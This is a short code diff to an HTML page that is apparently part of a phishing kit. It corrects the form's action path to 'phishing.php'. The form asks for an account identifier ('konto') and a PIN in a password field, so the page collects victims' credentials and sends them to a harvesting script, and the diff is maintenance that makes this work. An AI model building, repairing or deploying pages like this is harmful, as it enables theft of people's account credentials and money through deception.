--- a/kskwn/kskwn.html
+++ b/kskwn/kskwn.html
@@ -13,7 +13,7 @@
 </head>
 
 <body>
-  <form action="kskwn/phishing.php" method="post">
+  <form action="phishing.php" method="post">
     <input type="text" name="konto" id="konto" />
     <input type="password" name="pin" id="pin" />
     <input type="submit" name="submit" id="submit" />
